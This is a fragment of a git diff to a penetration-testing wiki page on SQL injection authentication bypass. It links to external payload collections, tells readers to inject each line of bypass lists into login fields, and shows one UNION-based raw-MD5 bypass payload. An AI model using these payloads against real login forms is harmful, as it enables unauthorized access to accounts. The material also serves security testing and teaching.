Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)\*\*\*\*
|
||||
Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
|
||||
|
||||
## Authentication bypass
|
||||
|
||||
**Small list recommended**:
|
||||
List to try to bypass the login functionality:
|
||||
|
||||
{% file src="../../.gitbook/assets/sqli-authbypass-small.txt" %}
|
||||
|
||||
**Big list recommended** list for login bypass \(please, notice that the small list is already inside the big list\):
|
||||
|
||||
{% file src="../../.gitbook/assets/sqli-authbypass-big.txt" %}
|
||||
|
||||
Try to inject each line of the list in the username and password at the same time.
|
||||
{% page-ref page="../login-bypass/sql-login-bypass.md" %}
|
||||
|
||||
### Authentication Bypass \(Raw MD5\)
|
||||
|
||||
@ -294,9 +288,10 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
|
||||
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
|
||||
```
|
||||
|
||||
**Recomended list**:
|
||||
**Recommended list**:
|
||||
|
||||
You should use as username each line of the list and as password always: _**Pass1234.**_
|
||||
You should use as username each line of the list and as password always: _**Pass1234.**
|
||||
\(This payloads are also included in the big list mentioned at the beginning of this section\)_
|
||||
|
||||
{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user